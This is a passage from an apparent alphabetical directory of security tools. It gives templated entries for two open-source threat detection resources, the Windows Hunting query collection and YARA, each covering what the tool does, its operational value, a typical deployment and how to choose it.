Back to Name Jump

Windows Hunting

• Website: https://github.com/beahunt3r/Windows-Hunting
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: Windows Hunting is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: A collection of Windows hunting queries.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Resources > Windows.

Back to Name Jump

Letter Y

This letter section contains 1 tools.

YARA

• Website: https://github.com/virustotal/yara
• Model: Open Source
• Category: Threat Detection
• Source Lists: Awesome Threat Detection

What it does: YARA is used in threat detection programs to support baseline hardening, monitoring integration, and defense-in-depth validation. Source summaries describe it as: The pattern matching swiss knife.

Operational value: Security teams commonly use this capability to improve consistency between detection, investigation, and response decisions, especially when alerts, evidence collection, and triage ownership are distributed across multiple teams.

Typical deployment pattern: Implementations usually start with scoped pilot coverage, baseline logging/telemetry validation, and explicit runbook mapping so analysts understand when to escalate, contain, or defer.

Selection considerations: As an open-source option, teams usually evaluate maintainer activity, release cadence, and community response quality. Related source context: Awesome Threat Detection and Hunting > Tools.

Back to Name Jump